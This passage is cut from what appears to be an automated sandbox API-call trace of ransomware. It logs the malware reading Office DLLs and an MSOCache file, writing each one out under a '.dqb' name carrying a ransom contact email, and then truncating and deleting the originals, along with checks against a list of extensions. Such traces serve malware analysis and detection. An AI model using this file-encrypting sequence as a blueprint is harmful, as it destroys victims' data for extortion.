Shared\\OFFICE14\\ACEOLEDB.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0058.013] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0058.014] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.014] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.014] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0058.072] GetLastError () returned 0x0 [0058.072] ReadFile (in: hFile=0x158, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x833a0, lpOverlapped=0x0) returned 1 [0058.116] WriteFile (in: hFile=0x1fc, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0x833b0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0x833b0, lpOverlapped=0x0) returned 1 [0058.126] ReadFile (in: hFile=0x158, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0058.126] WriteFile (in: hFile=0x1fc, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.126] SetEndOfFile (hFile=0x1fc) returned 1 [0058.126] CloseHandle (hObject=0x1fc) returned 1 [0058.126] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.126] SetEndOfFile (hFile=0x158) returned 1 [0058.131] CloseHandle (hObject=0x158) returned 1 [0058.131] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.132] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll")) returned 1 [0058.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0058.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0058.132] lstrlenW (lpString=".doc") returned 4 [0058.132] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.132] lstrlenW (lpString=".docx") returned 5 [0058.132] lstrcmpiW (lpString1=".docx", lpString2="B.DLL") returned -1 [0058.132] lstrlenW (lpString=".pdf") returned 4 [0058.132] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.132] lstrlenW (lpString=".xls") returned 4 [0058.132] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.132] lstrlenW (lpString=".xlsx") returned 5 [0058.132] lstrcmpiW (lpString1=".xlsx", lpString2="B.DLL") returned -1 [0058.132] lstrlenW (lpString=".ppt") returned 4 [0058.132] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0058.132] lstrlenW (lpString=".zip") returned 4 [0058.132] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.132] lstrlenW (lpString=".rar") returned 4 [0058.132] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.132] lstrlenW (lpString=".bz2") returned 4 [0058.132] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.132] lstrlenW (lpString=".7z") returned 3 [0058.133] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0058.133] lstrlenW (lpString=".dbf") returned 4 [0058.133] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0058.133] lstrlenW (lpString=".1cd") returned 4 [0058.133] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0058.133] lstrlenW (lpString=".jpg") returned 4 [0058.133] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0058.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0058.133] lstrlenW (lpString=".doc") returned 4 [0058.133] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.133] lstrlenW (lpString=".docx") returned 5 [0058.133] lstrcmpiW (lpString1=".docx", lpString2="B.DLL") returned -1 [0058.133] lstrlenW (lpString=".pdf") returned 4 [0058.133] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.133] lstrlenW (lpString=".xls") returned 4 [0058.133] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.133] lstrlenW (lpString=".xlsx") returned 5 [0058.133] lstrcmpiW (lpString1=".xlsx", lpString2="B.DLL") returned -1 [0058.133] lstrlenW (lpString=".ppt") returned 4 [0058.133] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0058.133] lstrlenW (lpString=".zip") returned 4 [0058.133] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.133] lstrlenW (lpString=".rar") returned 4 [0058.133] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.134] lstrlenW (lpString=".bz2") returned 4 [0058.134] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.134] lstrlenW (lpString=".7z") returned 3 [0058.134] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0058.134] lstrlenW (lpString=".dbf") returned 4 [0058.134] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0058.134] lstrlenW (lpString=".1cd") returned 4 [0058.134] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0058.134] lstrlenW (lpString=".jpg") returned 4 [0058.134] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.134] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0058.134] lstrlenW (lpString="ACEWSS.DLL") returned 10 [0058.134] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0060.091] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=318368) returned 1 [0060.091] CloseHandle (hObject=0x1fc) returned 1 [0060.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll")) returned 0x20 [0060.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0060.091] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0060.091] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0060.091] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0060.091] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0060.564] GetLastError () returned 0x0 [0060.564] ReadFile (in: hFile=0x1fc, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x4dba0, lpOverlapped=0x0) returned 1 [0061.574] WriteFile (in: hFile=0x204, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0x4dbb0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0x4dbb0, lpOverlapped=0x0) returned 1 [0061.580] ReadFile (in: hFile=0x1fc, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0061.580] WriteFile (in: hFile=0x204, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xe8, lpOverlapped=0x0) returned 1 [0061.580] SetEndOfFile (hFile=0x204) returned 1 [0061.580] CloseHandle (hObject=0x204) returned 1 [0061.580] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0061.580] SetEndOfFile (hFile=0x1fc) returned 1 [0061.583] CloseHandle (hObject=0x1fc) returned 1 [0061.583] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0061.584] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll")) returned 1 [0061.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0061.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0061.584] lstrlenW (lpString=".doc") returned 4 [0061.584] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0061.584] lstrlenW (lpString=".docx") returned 5 [0061.584] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0061.584] lstrlenW (lpString=".pdf") returned 4 [0061.584] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0061.584] lstrlenW (lpString=".xls") returned 4 [0061.584] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0061.584] lstrlenW (lpString=".xlsx") returned 5 [0061.584] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0061.584] lstrlenW (lpString=".ppt") returned 4 [0061.584] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0061.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0061.584] lstrlenW (lpString=".zip") returned 4 [0061.584] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0061.584] lstrlenW (lpString=".rar") returned 4 [0061.584] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0061.584] lstrlenW (lpString=".bz2") returned 4 [0061.584] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0061.584] lstrlenW (lpString=".7z") returned 3 [0061.584] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0061.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0061.584] lstrlenW (lpString=".dbf") returned 4 [0061.585] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0061.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0061.585] lstrlenW (lpString=".1cd") returned 4 [0061.585] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0061.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0061.585] lstrlenW (lpString=".jpg") returned 4 [0061.585] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0061.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0061.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0061.585] lstrlenW (lpString=".doc") returned 4 [0061.585] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0061.585] lstrlenW (lpString=".docx") returned 5 [0061.585] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0061.585] lstrlenW (lpString=".pdf") returned 4 [0061.585] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0061.585] lstrlenW (lpString=".xls") returned 4 [0061.585] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0061.585] lstrlenW (lpString=".xlsx") returned 5 [0061.585] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0061.585] lstrlenW (lpString=".ppt") returned 4 [0061.585] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0061.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0061.585] lstrlenW (lpString=".zip") returned 4 [0061.585] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0061.585] lstrlenW (lpString=".rar") returned 4 [0061.585] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0061.585] lstrlenW (lpString=".bz2") returned 4 [0061.585] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0061.585] lstrlenW (lpString=".7z") returned 3 [0061.585] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0061.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0061.585] lstrlenW (lpString=".dbf") returned 4 [0061.585] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0061.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0061.586] lstrlenW (lpString=".1cd") returned 4 [0061.586] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0061.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 66 [0061.586] lstrlenW (lpString=".jpg") returned 4 [0061.586] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0061.586] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0061.586] lstrlenW (lpString="CsiSoap.dll") returned 11 [0061.586] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0061.586] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=1784192) returned 1 [0061.586] CloseHandle (hObject=0x1fc) returned 1 [0061.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll")) returned 0x20 [0061.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0061.587] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0061.587] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0061.587] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0061.588] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0061.588] ReadFile (in: hFile=0x1fc, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0061.634] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x9132a, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0061.634] ReadFile (in: hFile=0x1fc, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0061.637] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0061.637] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x173980, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0061.637] ReadFile (in: hFile=0x1fc, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0061.748] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0061.748] WriteFile (in: hFile=0x1fc, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0061.828] SetEndOfFile (hFile=0x1fc) Thread: id = 13 os_tid = 0xad0 [0032.434] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x3880260 [0032.434] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x3890268 [0032.434] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0330 [0032.434] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6) returned 0x5c30b0 [0032.434] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0348 [0032.434] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x100000) returned 0x3a80020 [0032.435] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0360 [0032.435] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0360, Size=0x20) returned 0x5a5ca0 [0032.435] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0360 [0032.435] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0360, Size=0x20) returned 0x5a5c78 [0032.435] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.435] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.435] Wow64DisableWow64FsRedirection (in: OldValue=0x2efff58 | out: OldValue=0x2efff58*=0x0) returned 1 [0032.435] lstrlenW (lpString="kernel32.dll") returned 12 [0032.435] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5ca0 | out: hHeap=0x570000) returned 1 [0032.435] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.435] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5c78 | out: hHeap=0x570000) returned 1 [0032.435] Sleep (dwMilliseconds=0x64) [0032.620] Sleep (dwMilliseconds=0x64) [0033.064] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0033.064] lstrlenW (lpString="PublisherMUI.xml") returned 16 [0033.064] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0033.380] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1450) returned 1 [0033.380] CloseHandle (hObject=0x188) returned 1 [0033.380] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 0x2020 [0033.380] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0033.380] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0033.380] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0033.380] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0033.380] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0034.351] GetLastError () returned 0x0 [0034.351] ReadFile (in: hFile=0x188, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x5aa, lpOverlapped=0x0) returned 1 [0034.364] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0034.365] ReadFile (in: hFile=0x188, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0034.365] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xf4, lpOverlapped=0x0) returned 1 [0034.365] SetEndOfFile (hFile=0x180) returned 1 [0034.365] CloseHandle (hObject=0x180) returned 1 [0034.366] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0034.366] SetEndOfFile (hFile=0x188) returned 1 [0034.367] CloseHandle (hObject=0x188) returned 1 [0034.367] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.367] DeleteFileW (lpFileName="C:\\MSOCache\\All 